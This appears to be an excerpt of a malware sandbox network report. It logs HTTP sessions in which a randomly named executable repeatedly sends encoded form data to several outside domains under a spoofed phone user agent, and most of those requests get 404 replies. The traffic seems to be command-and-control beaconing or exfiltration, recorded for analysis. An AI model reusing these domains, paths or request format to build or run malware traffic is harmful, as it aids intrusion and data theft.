                      Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20
                      Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      11192.168.2.450412154.23.184.240803120C:\Program Files (x86)\wAiOCcamxRfzdBcBWXwLfjHIIYCfAhsLfVGJoOsCkvsHCbLMZ\usnnduqerdgHbr.exe
                      TimestampBytes transferredDirectionData
                      Sep 13, 2024 12:28:08.649504900 CEST10835OUTPOST /edpl/ HTTP/1.1
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                      Accept-Language: en-US,en;q=0.9
                      Accept-Encoding: gzip, deflate
                      Host: www.hm62t.top
                      Origin: http://www.hm62t.top
                      Content-Length: 10305
                      Content-Type: application/x-www-form-urlencoded
                      Cache-Control: no-cache
                      Connection: close
                      Referer: http://www.hm62t.top/edpl/
                      User-Agent: SAMSUNG-GT-E2350B/1.0 Openwave/6.2.3 Profile/MIDP-2.0 Configuration/CLDC-1.1 UP.Browser/6.2.3.3.c.1.101 (GUI) MMP/2.0
                      Data Raw: 4d 74 58 48 38 64 52 48 3d 6e 39 5a 37 70 2b 45 42 4f 45 6c 4a 61 63 4f 37 45 34 32 4f 4a 4a 7a 63 49 56 6f 49 2b 44 74 46 41 61 39 47 6d 57 55 65 68 63 61 6c 59 64 39 46 6f 72 62 57 64 35 66 73 53 31 37 58 77 76 37 6e 39 64 74 46 6f 47 55 43 51 64 66 35 70 6a 4e 70 36 62 37 2f 57 6c 65 78 65 6b 58 59 4a 2f 75 65 37 6a 47 77 48 64 59 72 33 31 6a 55 36 4e 43 57 59 49 4e 76 57 4c 41 5a 35 36 57 4b 77 38 41 64 4b 36 34 67 44 4e 72 38 53 4e 41 73 6c 78 4c 42 4b 64 53 50 58 44 43 7a 76 4b 65 39 66 4e 76 5a 72 45 43 6d 38 44 76 41 66 38 69 6b 59 66 78 7a 2f 4d 53 6b 37 54 68 43 62 65 36 66 37 6e 73 61 4e 78 75 74 2f 70 5a 61 58 36 4d 62 6d 42 48 56 79 46 78 6e 4b 69 78 67 66 4c 6e 46 76 67 41 59 74 73 2b 47 4e 68 41 71 49 38 38 33 4b 56 6e 64 37 77 6e 30 62 69 42 37 30 67 78 66 6a 78 59 6d 31 74 78 75 57 58 4c 61 4e 53 56 41 41 64 76 74 6f 5a 34 54 6c 6d 7a 47 4a 39 76 66 79 4c 39 35 61 74 33 6e 47 41 4d 79 76 4e 4c 6f 72 32 58 4e 53 61 78 34 4d 43 51 43 4b 75 38 6b 39 41 41 53 74 44 74 77 66 68 64 71 6e [TRUNCATED]
                      Data Ascii: MtXH8dRH=n9Z7p+EBOElJacO7E42OJJzcIVoI+DtFAa9GmWUehcalYd9ForbWd5fsS17Xwv7n9dtFoGUCQdf5pjNp6b7/WlexekXYJ/ue7jGwHdYr31jU6NCWYINvWLAZ56WKw8AdK64gDNr8SNAslxLBKdSPXDCzvKe9fNvZrECm8DvAf8ikYfxz/MSk7ThCbe6f7nsaNxut/pZaX6MbmBHVyFxnKixgfLnFvgAYts+GNhAqI883KVnd7wn0biB70gxfjxYm1txuWXLaNSVAAdvtoZ4TlmzGJ9vfyL95at3nGAMyvNLor2XNSax4MCQCKu8k9AAStDtwfhdqnYYInd7qypuTnpiCrxR/DTseasep7MV63SZG39brEYRdSl5WNFoB7sEth95Mpj83n//aYCzOdoUaW+7Q9EadT2SPxTLnQMBwdcJnaR4Vz5lMJ8vZeAvGmYWWhXVNPD06L9fM9LDe/qWqTpDCmbflUYTBEyMlOprou53P+0G8BJdSvgd7XmZs29ouiLVe3PECkVEUnn57xtcwTPd0EkSDWfFIKM9liHzvjzeeiWzS7qiSq89NaXhffNMwyoaHX5F1Limv1uS64S/9jgm/S05akmhv9xen6UDns818/AgX34zDtjRpNoqkzNChiVZl66xkiDUOIULsJfzsER+NIQ6fwnrap59oEn4JBhFXE6cEQMSBcV1ZTSE0UlAcbrpzKM/OkE63e01FOl/BCsmPIhYLX+26MYF9O//3TsRob+MFmgm/aoNZ0y+nli0V9CfL1+LJ/tVXD2m0IF+VsbF/n0SRZcFxYSMVaHGP6CXnj+uH4nhRv0gRA3NCeuEvu/uw0hlYzGkqIKoiwIQdVElN4qdEM3CvjXop8Ttu4L11U0T9YzTPBTkxHVejGX7PhmdhzBW2JpOhkU1/NY4Ap1FygXavxh75doQF6DyCq4JN4VMubNhIYyYixP/oUHLqEUb16Iw2kgwmS7nZfOKQX3R6JxFTxeb2PWB7e1kH7NX [TRUNCATED]
                      Sep 13, 2024 12:28:09.804702997 CEST312INHTTP/1.1 404 Not Found
                      Server: nginx
                      Date: Fri, 13 Sep 2024 10:28:09 GMT
                      Content-Type: text/html
                      Content-Length: 148
                      Connection: close
                      ETag: "66a8e223-94"
                      Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20
                      Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      12192.168.2.450413154.23.184.240803120C:\Program Files (x86)\wAiOCcamxRfzdBcBWXwLfjHIIYCfAhsLfVGJoOsCkvsHCbLMZ\usnnduqerdgHbr.exe
                      TimestampBytes transferredDirectionData
                      Sep 13, 2024 12:28:11.194531918 CEST479OUTGET /edpl/?MtXH8dRH=q/xbqOJEbFxqZdP5Pq3VIJihKFYuoTJpC6d7rXUvusGBValkv/SoX8DUGkqJst/hxOtwmyY8Q6nb8zkY9ZrFeAmdQleBPpTMkSiDA6E42mjQ0ujKW4BvX8M=&EB04T=0hSTF8phw HTTP/1.1
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                      Accept-Language: en-US,en;q=0.9
                      Host: www.hm62t.top
                      Connection: close
                      User-Agent: SAMSUNG-GT-E2350B/1.0 Openwave/6.2.3 Profile/MIDP-2.0 Configuration/CLDC-1.1 UP.Browser/6.2.3.3.c.1.101 (GUI) MMP/2.0
                      Sep 13, 2024 12:28:12.118376970 CEST312INHTTP/1.1 404 Not Found
                      Server: nginx
                      Date: Fri, 13 Sep 2024 10:28:11 GMT
                      Content-Type: text/html
                      Content-Length: 148
                      Connection: close
                      ETag: "66a8e223-94"
                      Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20
                      Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      13192.168.2.45041447.104.180.139803120C:\Program Files (x86)\wAiOCcamxRfzdBcBWXwLfjHIIYCfAhsLfVGJoOsCkvsHCbLMZ\usnnduqerdgHbr.exe
                      TimestampBytes transferredDirectionData
                      Sep 13, 2024 12:28:17.698633909 CEST748OUTPOST /6m23/ HTTP/1.1
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                      Accept-Language: en-US,en;q=0.9
                      Accept-Encoding: gzip, deflate
                      Host: www.zhuoyueapp.top
                      Origin: http://www.zhuoyueapp.top
                      Content-Length: 205
                      Content-Type: application/x-www-form-urlencoded
                      Cache-Control: no-cache
                      Connection: close
                      Referer: http://www.zhuoyueapp.top/6m23/
                      User-Agent: SAMSUNG-GT-E2350B/1.0 Openwave/6.2.3 Profile/MIDP-2.0 Configuration/CLDC-1.1 UP.Browser/6.2.3.3.c.1.101 (GUI) MMP/2.0
                      Data Raw: 4d 74 58 48 38 64 52 48 3d 38 50 6e 65 62 77 6d 4a 61 66 49 70 44 30 69 71 64 54 75 73 4e 5a 33 67 6d 64 43 58 46 41 52 31 61 79 33 4b 66 6f 32 6c 70 70 6a 76 7a 6c 6e 72 51 6d 4c 41 46 61 48 69 72 54 5a 4d 38 67 63 6a 49 53 4d 32 43 62 70 51 6e 4f 37 4b 76 64 50 6b 67 4a 67 63 52 2f 37 54 37 2f 50 4b 35 68 2b 76 43 6c 4f 6f 6f 6a 2f 79 4d 2f 36 4e 38 62 5a 32 6f 71 66 76 56 6e 2b 67 4a 49 58 57 76 61 6b 54 43 68 68 72 58 36 34 6f 49 57 4a 69 75 4d 54 2b 7a 55 54 48 46 77 6b 52 4f 52 55 39 67 42 4e 58 57 4b 59 67 72 49 55 77 4a 5a 59 44 6c 4a 4c 39 76 37 30 69 2f 68 46 55 74 30 63 43 77 4f 4e 6b 52 51 3d 3d
                      Data Ascii: MtXH8dRH=8PnebwmJafIpD0iqdTusNZ3gmdCXFAR1ay3Kfo2lppjvzlnrQmLAFaHirTZM8gcjISM2CbpQnO7KvdPkgJgcR/7T7/PK5h+vClOooj/yM/6N8bZ2oqfvVn+gJIXWvakTChhrX64oIWJiuMT+zUTHFwkRORU9gBNXWKYgrIUwJZYDlJL9v70i/hFUt0cCwONkRQ==
                      Sep 13, 2024 12:28:18.856379986 CEST545INHTTP/1.1 404 Not Found
                      Date: Fri, 13 Sep 2024 10:28:18 GMT
                      Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.6.40
                      Strict-Transport-Security: max-age=3153600000; includeSubDomains
                      X-Content-Type-Options: nosniff
                      X-XSS-Protection: 1; mode=block
                      Content-Length: 203
                      Connection: close
                      Content-Type: text/html; charset=iso-8859-1
                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 36 6d 32 33 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /6m23/ was not found on this server.</p></body></html>


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      14192.168.2.45041547.104.180.139803120C:\Program Files (x86)\wAiOCcamxRfzdBcBWXwLfjHIIYCfAhsLfVGJoOsCkvsHCbLMZ\usnnduqerdgHbr.exe
                      TimestampBytes transferredDirectionData
                      Sep 13, 2024 12:28:20.249839067 CEST768OUTPOST /6m23/ HTTP/1.1
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                      Accept-Language: en-US,en;q=0.9
                      Accept-Encoding: gzip, deflate
                      Host: www.zhuoyueapp.top
                      Origin: http://www.zhuoyueapp.top
                      Content-Length: 225
                      Content-Type: application/x-www-form-urlencoded
                      Cache-Control: no-cache
                      Connection: close
                      Referer: http://www.zhuoyueapp.top/6m23/
                      User-Agent: SAMSUNG-GT-E2350B/1.0 Openwave/6.2.3 Profile/MIDP-2.0 Configuration/CLDC-1.1 UP.Browser/6.2.3.3.c.1.101 (GUI) MMP/2.0
                      Data Raw: 4d 74 58 48 38 64 52 48 3d 38 50 6e 65 62 77 6d 4a 61 66 49 70 44 58 71 71 52 55 53 73 4c 35 33 6e 71 39 43 58 66 77 52 78 61 79 37 4b 66 73 4f 54 70 37 48 76 79 45 58 72 52 6a 2f 41 43 61 48 69 79 6a 5a 51 68 77 63 65 49 53 78 44 43 61 46 51 6e 4f 76 4b 76 66 58 6b 67 61 34 62 44 2f 37 52 7a 66 50 49 6b 78 2b 76 43 6c 4f 6f 6f 69 61 66 4d 2f 79 4e 39 6f 42 32 36 59 33 6f 5a 48 2b 6e 4f 49 58 57 6b 36 6b 66 43 68 68 4e 58 34 63 43 49 55 42 69 75 4e 6a 2b 7a 41 48 45 51 67 6b 58 41 78 56 6c 67 42 4d 63 54 2f 31 4a 74 72 45 55 4b 35 42 75 67 50 61 6e 2b 4b 56 31 74 68 68 6e 77 7a 56 32 39 4e 77 74 4b 62 64 78 46 6b 72 6b 66 62 6c 68 48 70 69 42 55 31 47 6f 66 55 30 3d
                      Data Ascii: MtXH8dRH=8PnebwmJafIpDXqqRUSsL53nq9CXfwRxay7KfsOTp7HvyEXrRj/ACaHiyjZQhwceISxDCaFQnOvKvfXkga4bD/7RzfPIkx+vClOooiafM/yN9oB26Y3oZH+nOIXWk6kfChhNX4cCIUBiuNj+zAHEQgkXAxVlgBMcT/1JtrEUK5BugPan+KV1thhnwzV29NwtKbdxFkrkfblhHpiBU1GofU0=
                      Sep 13, 2024 12:28:21.404572964 CEST545INHTTP/1.1 404 Not Found
                      Date: Fri, 13 Sep 2024 10:28:21 GMT
                      Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.6.40
                      Strict-Transport-Security: max-age=3153600000; includeSubDomains
                      X-Content-Type-Options: nosniff
                      X-XSS-Protection: 1; mode=block
                      Content-Length: 203
                      Connection: close
                      Content-Type: text/html; charset=iso-8859-1
                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 36 6d 32 33 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /6m23/ was not found on this server.</p></body></html>


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      15192.168.2.45041647.104.180.139803120C:\Program Files (x86)\wAiOCcamxRfzdBcBWXwLfjHIIYCfAhsLfVGJoOsCkvsHCbLMZ\usnnduqerdgHbr.exe
                      TimestampBytes transferredDirectionData
                      Sep 13, 2024 12:28:22.796809912 CEST10850OUTPOST /6m23/ HTTP/1.1
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                      Accept-Language: en-US,en;q=0.9
                      Accept-Encoding: gzip, deflate
                      Host: www.zhuoyueapp.top
                      Origin: http://www.zhuoyueapp.top
                      Content-Length: 10305
                      Content-Type: application/x-www-form-urlencoded
                      Cache-Control: no-cache
                      Connection: close
                      Referer: http://www.zhuoyueapp.top/6m23/
                      User-Agent: SAMSUNG-GT-E2350B/1.0 Openwave/6.2.3 Profile/MIDP-2.0 Configuration/CLDC-1.1 UP.Browser/6.2.3.3.c.1.101 (GUI) MMP/2.0
                      Data Raw: 4d 74 58 48 38 64 52 48 3d 38 50 6e 65 62 77 6d 4a 61 66 49 70 44 58 71 71 52 55 53 73 4c 35 33 6e 71 39 43 58 66 77 52 78 61 79 37 4b 66 73 4f 54 70 37 50 76 7a 32 76 72 65 67 58 41 44 61 48 69 74 54 5a 41 68 77 63 50 49 53 5a 48 43 61 5a 71 6e 4d 58 4b 75 38 66 6b 31 62 34 62 5a 76 37 52 2f 2f 50 4a 35 68 2b 36 43 6c 65 73 6f 69 4b 66 4d 2f 79 4e 39 71 31 32 34 4b 66 6f 66 48 2b 67 4a 49 57 5a 76 61 6b 7a 43 68 35 7a 58 34 59 34 49 6b 68 69 74 74 7a 2b 77 31 54 45 52 41 6b 56 44 78 56 32 67 42 41 54 54 37 56 6a 74 6f 59 71 4b 37 64 75 73 71 75 35 6d 6f 5a 6f 33 41 68 43 69 69 74 2b 79 2f 49 47 54 4a 42 46 4c 31 37 64 4a 5a 74 79 64 37 33 51 4c 33 57 58 4b 55 32 7a 46 52 62 4d 42 43 6a 75 44 36 32 31 77 65 76 58 33 46 45 6d 33 47 79 70 46 78 49 78 68 44 5a 6a 41 4b 38 74 48 71 48 42 72 41 55 72 79 55 68 68 71 45 63 32 4f 4f 51 43 46 74 31 6e 69 41 36 36 6f 79 65 6f 6d 43 35 43 61 66 6c 69 71 4e 2b 78 62 4d 30 50 6f 51 52 48 5a 36 4d 33 30 6f 64 47 32 71 79 4c 73 71 75 7a 4d 6a 72 4a 32 42 7a 7a 49 [TRUNCATED]
                      Data Ascii: MtXH8dRH=8PnebwmJafIpDXqqRUSsL53nq9CXfwRxay7KfsOTp7Pvz2vregXADaHitTZAhwcPISZHCaZqnMXKu8fk1b4bZv7R//PJ5h+6ClesoiKfM/yN9q124KfofH+gJIWZvakzCh5zX4Y4Ikhittz+w1TERAkVDxV2gBATT7VjtoYqK7dusqu5moZo3AhCiit+y/IGTJBFL17dJZtyd73QL3WXKU2zFRbMBCjuD621wevX3FEm3GypFxIxhDZjAK8tHqHBrAUryUhhqEc2OOQCFt1niA66oyeomC5CafliqN+xbM0PoQRHZ6M30odG2qyLsquzMjrJ2BzzIITBmi537sWl/AagbTWcLRWwzns0oUjpEY9rNQYeshWqf9ZmL/hiT8NyVPQ1umYeELWFdmodAPf03h+Y1gamM6cY+4D3BNf6V+q/RstEWTSKlVDkkP21XKI3w7M7jNj1W2g4Wig5DqTBZiW9pveSgO2sXLD/L6TP/qIAQt6O5qA7rYYVmnU32SaXbGMY8Fme89yKmP5LGuqofdHr7McFiClJwjrKd2K11Hjl63bqwYxqdW07dAnvHv8n4G8i79pIjI30vCpCaPtmAu7vUbcxpjHA4vqzhfClOyMOKIC6WXdWjR4LzeQ+DzUMVHnSH9PjxaV11GC+x6wo2P7xG9L887YH+owLUSrnrJiZ4BkfKbKDmn0VpyQXoOyhnd5ZWSW+I1KGeVnpGAjmF66gcw05ZcaBl4trG/J3stHSNeR1/arQRmeQRTBH564c6hJOjfZhNxOTkxEiwuGkCHdzcfU5s6VsnuAk9cUxEfQhjQP/ql9clC5e7HoLmvyqhEDQE/gz72/B0wvav0iGM0i9GiQs+OPeiYwU8hJwImUo1LdbHrEDGb+boppZzQlhfn816JhTgveumNr82B7iYnVHRwyWF95HNDyfjzvX94+FILNYHmnXrab7b1UGzHg3Cn4+7ujwJ/BhbQgavZ4L3+V9Nb+YoUwshCbpg+FA+CK [TRUNCATED]
                      Sep 13, 2024 12:28:23.960778952 CEST545INHTTP/1.1 404 Not Found
                      Date: Fri, 13 Sep 2024 10:28:23 GMT
                      Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.6.40
                      Strict-Transport-Security: max-age=3153600000; includeSubDomains
                      X-Content-Type-Options: nosniff
                      X-XSS-Protection: 1; mode=block
                      Content-Length: 203
                      Connection: close
                      Content-Type: text/html; charset=iso-8859-1
                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 36 6d 32 33 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /6m23/ was not found on this server.</p></body></html>


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      16192.168.2.45041747.104.180.139803120C:\Program Files (x86)\wAiOCcamxRfzdBcBWXwLfjHIIYCfAhsLfVGJoOsCkvsHCbLMZ\usnnduqerdgHbr.exe
                      TimestampBytes transferredDirectionData
                      Sep 13, 2024 12:28:25.332824945 CEST484OUTGET /6m23/?MtXH8dRH=xNP+YF7kN8YyHFbGfhCbM4vPtrObLTBpZTX0aom8zYno+17KeimnOIL9nX5Ojh8oMyFsBplL+bbJn9Xx4KkSTeDh/PbqhhexF1uqyGHiSdrf0qV82I/xPx8=&EB04T=0hSTF8phw HTTP/1.1
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                      Accept-Language: en-US,en;q=0.9
                      Host: www.zhuoyueapp.top
                      Connection: close
                      User-Agent: SAMSUNG-GT-E2350B/1.0 Openwave/6.2.3 Profile/MIDP-2.0 Configuration/CLDC-1.1 UP.Browser/6.2.3.3.c.1.101 (GUI) MMP/2.0
                      Sep 13, 2024 12:28:26.499989033 CEST545INHTTP/1.1 404 Not Found
                      Date: Fri, 13 Sep 2024 10:28:26 GMT
                      Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.6.40
                      Strict-Transport-Security: max-age=3153600000; includeSubDomains
                      X-Content-Type-Options: nosniff
                      X-XSS-Protection: 1; mode=block
                      Content-Length: 203
                      Connection: close
                      Content-Type: text/html; charset=iso-8859-1
                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 36 6d 32 33 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /6m23/ was not found on this server.</p></body></html>


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      17192.168.2.4504183.33.130.190803120C:\Program Files (x86)\wAiOCcamxRfzdBcBWXwLfjHIIYCfAhsLfVGJoOsCkvsHCbLMZ\usnnduqerdgHbr.exe
                      TimestampBytes transferredDirectionData
                      Sep 13, 2024 12:28:39.642297983 CEST757OUTPOST /7d10/ HTTP/1.1
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                      Accept-Language: en-US,en;q=0.9
                      Accept-Encoding: gzip, deflate
                      Host: www.autonashville.com
                      Origin: http://www.autonashville.com
                      Content-Length: 205
                      Content-Type: application/x-www-form-urlencoded
                      Cache-Control: no-cache
                      Connection: close
                      Referer: http://www.autonashville.com/7d10/
                      User-Agent: SAMSUNG-GT-E2350B/1.0 Openwave/6.2.3 Profile/MIDP-2.0 Configuration/CLDC-1.1 UP.Browser/6.2.3.3.c.1.101 (GUI) MMP/2.0
                      Data Raw: 4d 74 58 48 38 64 52 48 3d 38 6b 67 75 47 30 2f 5a 44 62 38 37 56 52 38 79 76 50 34 2f 78 4d 6c 36 39 52 59 69 4d 61 7a 62 6d 4f 62 73 43 75 48 4f 36 51 55 47 2f 45 4a 52 56 5a 79 62 4b 2b 76 76 32 6c 30 73 70 77 57 72 6e 6b 58 32 72 53 6a 72 42 4c 34 4d 79 62 6b 59 74 7a 2b 77 31 39 75 54 44 62 7a 59 62 79 45 37 52 68 7a 4a 4d 32 2f 45 6a 33 63 4e 78 48 4e 65 69 41 47 4a 52 56 71 38 48 6f 62 72 2f 5a 63 70 59 71 79 50 44 2f 61 35 55 55 56 31 66 4d 63 4d 71 55 67 62 66 37 39 2f 67 31 36 64 77 49 54 4b 74 73 34 68 31 77 49 52 47 38 79 2b 77 66 6a 78 46 48 79 43 58 50 52 7a 79 4f 33 6b 4c 70 71 39 52 41 3d 3d
                      Data Ascii: MtXH8dRH=8kguG0/ZDb87VR8yvP4/xMl69RYiMazbmObsCuHO6QUG/EJRVZybK+vv2l0spwWrnkX2rSjrBL4MybkYtz+w19uTDbzYbyE7RhzJM2/Ej3cNxHNeiAGJRVq8Hobr/ZcpYqyPD/a5UUV1fMcMqUgbf79/g16dwITKts4h1wIRG8y+wfjxFHyCXPRzyO3kLpq9RA==


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      18192.168.2.4504193.33.130.190803120C:\Program Files (x86)\wAiOCcamxRfzdBcBWXwLfjHIIYCfAhsLfVGJoOsCkvsHCbLMZ\usnnduqerdgHbr.exe
                      TimestampBytes transferredDirectionData
                      Sep 13, 2024 12:28:42.178606987 CEST777OUTPOST /7d10/ HTTP/1.1
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                      Accept-Language: en-US,en;q=0.9
                      Accept-Encoding: gzip, deflate
                      Host: www.autonashville.com
                      Origin: http://www.autonashville.com
                      Content-Length: 225
                      Content-Type: application/x-www-form-urlencoded
                      Cache-Control: no-cache
                      Connection: close
                      Referer: http://www.autonashville.com/7d10/
                      User-Agent: SAMSUNG-GT-E2350B/1.0 Openwave/6.2.3 Profile/MIDP-2.0 Configuration/CLDC-1.1 UP.Browser/6.2.3.3.c.1.101 (GUI) MMP/2.0
